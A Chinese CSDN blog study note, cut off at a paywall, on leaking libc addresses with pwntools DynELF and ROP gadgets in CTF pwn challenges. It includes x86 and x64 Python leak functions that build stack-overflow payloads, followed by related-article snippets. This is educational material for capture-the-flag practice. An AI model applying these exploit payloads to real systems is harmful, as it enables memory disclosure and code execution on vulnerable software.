用DynELF模块和通用gadget实现libc通杀(详细注释)

最新推荐文章于 2023-09-16 23:52:06 发布
最新推荐文章于 2023-09-16 23:52:06 发布
阅读量791 收藏 6
点赞数 1
分类专栏: 学习笔记 文章标签: libc pwn rop
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48066554/article/details/118102879
版权

用DynELF模块和通用gadget实现libc通杀(详细注释)

文章目录

泄露libc版本方式

主要原理:利用栈溢出等写入栈的手段调用write或者puts函数,并控制write或puts函数参数泄露libc函数真实地址

  • write函数特点:可以控制大小,但是在64位程序中需要使用gadget进行寄存器传参,有时可能碰不到合适gadget
  • puts函数特点:不可控制输出大小,但是所需参数少,常见,使用灵活。
x86版本

由于x86程序直接使用栈传参,所以可以直接通过构造栈控制函数调用参数

XDCTF2015-pwn200为例

def leak(address):
	payload = "A" * 112  # 栈大小
	payload += p32(writeplt)  # write函数plt表地址地址
	payload += p32(vulnaddress)  # 返回地址,持续控制
	payload += p32(1)  # write标准输出
	payload += p32(address)  # 目的输出
	payload += p32(4)  # 长度
	p.send(payload)
	data = p.recv(4)  # recv长度4字节
	print "%#x => %s" % (address, (data or '').encode('hex'))
	return data
x64版本

x64程序先使用寄存器传参,当参数不多于6个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9

LCTF2016-pwn100为例

由于在程序中没有找到write函数的调用,所以只能使用puts函数进行泄露

def leak(address):
  count = 0
  data = ''
  payload = "A" * 64 + "A" * 8  # 填充垃圾数据
  payload += p64(poprdi) + p64(address)  # 目标地址,需要先把地址pop到rdi中
  payload += p64(putsplt)  # 调用puts
  payload += p64(startaddress)  # 因为puts函数会一直输出,直到遇到栈中的截断字符,所以为了保证栈的平衡,所以返回到start
  payload = payload.ljust(200, "B")
  p.send(payload)
  print p.recvuntil('bye~n')
  up = ""
  # 为了接收到puts函数输出的所有字符,逐字符的接收拼接字符串,因为不知道puts函数以什么字符结束输出,所以引入超时机制
  while True:
    c = p.recv(numb=1, timeout=0.5)
    count += 1
    if up == 'n'
最低0.47元/天 解锁文章
lunat:c
关注
专栏目录
通用gadget_libc_csu_init的使用
zszcr的博客
03-30 3458
蒸米 栈溢出的x64位 level5 wp=================_libc_csu_init函数是程序调用libc库用来对程序进行初始化的函数,一般先于main函数执行而我们则是要利用_libc_csu_init其中两端特殊的gadgetgadget 位于 0x400600 和 0x40061a地址先借用0x40061a 处的gadget 将想要压入寄存器的参数压入顺序依次 rbx r...
一些汇编的知识顺便填上 通用gadget_libc_csu_init的坑
zszcr的博客
04-06 1360
我写这篇博客主要是因为某人对我发起的灵魂拷问为什么level5利用_libc_csu_init 的gadget构造的payload要在末尾加上0x38个填充字符我听到这个问题是很蒙蔽的,我当时想当然的讲是用来维持栈平衡的,然rsp的值变成初始状态,可是经过一番深刻的讨论发现,不是这样子的,然后那个diaomao 就出去浪了,留我一个人思考这个问题首先这个问题需要有一定的汇编基础:(因为这道题是64...
DynELF使用小结
ATFWUS的博客
03-12 6060
0x01.感悟 DynELF对于没有libc的题来说,真的非常好用,可以得到system的地址,比面对几十上百种libc可能的LibcSearcher简直不要太好用,真的是一个好工具!!! 0x02.注意事项 DynELF的使用,也需要注意一些限制条件和具体的使用范围: DynELF的原理是在内存中不断搜索地址信息,所以漏洞一定要可以反复的被利用。 因为需要输出地址,所以一定需要相关的相...
pwn 练习笔记 暑假第八天 DynELF模块
SsMing的博客
07-20 1934
继续昨天的未解之谜,leve4 在第二次感受火狐崩溃带来的绝望之后,在此立誓,再也不用火狐写博客 IDA打开查看一下伪代码: 图没截全,罢啦罢啦!那vul函数就看汇编吧 可看出,我们输入的字符串与ebp距离为0x88 checksec查看,开了nx保护 ROPgadget查看,没有‘/bin/sh’ DynELFpwntools中专门用来应对无libc情况的漏洞利用模块...
jarvisoj level4 wp ROPDynELF模块
ditto的博客
12-31 550
拿到题目 开启了NX。 放IDA里: 栈溢出。 程序本身没有调用system函数 无法ret2plt。 且题目本身没有给出目标的动态库的版本。题目本身有write函数,可以泄露内存,则可以利用pwntools的DynELF模块,找到system函数。 本身程序段没有/bin/sh的字符串,则需要使用read函数将字符串读入,read函数有三个参数,这就需要pop pop pop ret这...
DynELF
ATFWUS的博客
03-03 490
0x01.概述 DynELFpwntools中专门用来应对没有libc情况的漏洞利用模块,在提供一个目标程序任意地址内存泄漏函数的情况下,可以解析任意加载库的任意符号地址。 对于不同版本的libc,函数首地址相对于文件开头的偏移和函数间的偏移不一定一致;如果题目不提供libc,我们通过泄露任意一个库函数地址计算出system函数地址的方法可能就不太方便了,所以这就要求我们想办法获取目标系统的...
泄漏地址总结(Dynelf & LibcSearcher)
weixin_44319142的博客
04-16 2678
Dynelf泄漏modeul 32位 p = process('./xxx') def leak(address): #address指要泄露的地址 #各种预处理 payload = "xxxxxxxx" + address + "xxxxxxxx" p.send(payload) #各种处理 data = p.recv(4) log.debug("%#x => %...
USB-Gadget子系统之 configfs 使用手册
07-31
参照此官方文档,可以在用户空间使用configfs配置内核对象。
DynELF获取libc版本
Sakura给爷pwn全场
02-25 159
参考题目:攻防世界pwn-200、pwn-100 https://blog.csdn.net/weixin_43868725/article/details/107878667
实验5-通用gadget之lab4
qq_44759495的博客
04-16 305
实验原理与目的 上一篇以及介绍了实验原理,就是程序在编译时会加入一些通用函数来进行初始化操作,我们可以针对初始化函数来提取一些通用gadget,通过泄露某个在libc中的内容在内存中的实际地址,通过计算偏移量来得到system和bin/sh的地址,然后利用返回指令ret连接代码,最终getshell。然而本次实验比较巧妙的地方就是利用了leave指令。 leave|ret leave指令其实是两...
HITCTF PWN300--dynelf
Vccxx的博客
04-08 1081
第一次用Dynelf,脚本调了一下午。。hitctf pwn300题目链接:http://pan.baidu.com/s/1eSCCOE2漏洞分析:三个write之前的一个函数调用了read来读入字符,而这里存在明显的缓冲区溢出,可以覆盖main函数的栈地址,这个题没给libc,got表里没有system之类的函数,于是考虑用dynelf。攻击脚本:from pwn import * io = pr
什么是gadget,以及64位libc如何泄露的问题
qq_43557177的博客
04-06 3472
最近开始学PWN,本以为栈溢出也就那些东西,看来是我少虑了… 在这里对这几天所学习的64位栈溢出泄露Libc的相关知识做一个小总结,当然,如果可以帮助到在读文章的你就更好啦。如果文中有错误,也希望各位大佬予以斧正。 什么是LIbc? 这个就是libc 这是一个动态链接文件 那么什么是动态链接和静态链接? 可以理解为: 静态链接:在程序编译的过程中,就预先把代码加载进程序中 //比如大家都经常写的...
pwn libcDynelf工具
清霂的博客
04-02 560
目录pwn-100pwn-200welpwn Dynelf工具可以根据泄露出的地址找到相应libc版本的其他函数地址,但缺点时不能查找字符串也就是"/bin/sh"的地址,所以找到system函数后,往往还需要找到一个可写的地方用read函数读取"/bin/sh" pwn-100 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="amd64", log_level="debug") contentt = 1 #elf e
DynELFpwn200
weixin_44464829的博客
11-15 222
在做漏洞利用时,由于 ASLR 的影响,我们在获取某些函数地址的时候,需要一些特殊的操作。一种方法是先泄露出 libc.so 中的某个函数,然后根据函数之间的偏移,计算得到我们需要的函数地址,这种方法的局限性在于我们需要能找到和目标服务器上一样的 libc.so,而有些特殊情况下往往并不能找到。而另一种方法,利用如 pwntools 的 DynELF 模块,对内存进行搜索,直接得到我们需要的函数地址。 DynELFpwntools中专门用来应对无libc情况的漏洞利用模块,其基本代码框架如下。 p.
[PWN] jarvisoj_level4 DynELF()函数使用总结
最新发布
LDX的博客
09-16 143
DynELF使用技巧和示例
Pwn-栈溢出之DynELF
CharlesGodX的博客
03-08 945
0x00:前言 DynELF方法适用于没有libc的情况,我们可以通过DynELF方法来实现泄露system函数的地址,那么DynELF是什么呢?在pwntools官方文档有介绍,简单而言就是通过leak方法反复进入main函数中查询libc中的内容,其代码框架如下 p = process('./xxx') def leak(address): payload = "xxxxxxxx" + a...
DynELF的原理及应用
Sakura给爷pwn全场
03-29 595
Pwntools之DynELF原理探究: https://www.freebuf.com/articles/system/193646.html
pwntools库DynELF函数使用小结
PLpa的博客
09-01 1735
DynELF函数 0x00.前言 当我们在使用ROP做题目的时候,发现题目并没有给出libc.so文件(或者libc.so直接给错),这就让一部分人犯了难,这个问题怎么解决嘞?这里,我们介绍一种不需要给出libc.so实体文件,我们直接从库里匹配libc.so的方法——pwntools中的DynELF函数。 0x01.使用条件 既然我们要使用这个函数,我们就必须知道这个函数使用起来要什么条件。 要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值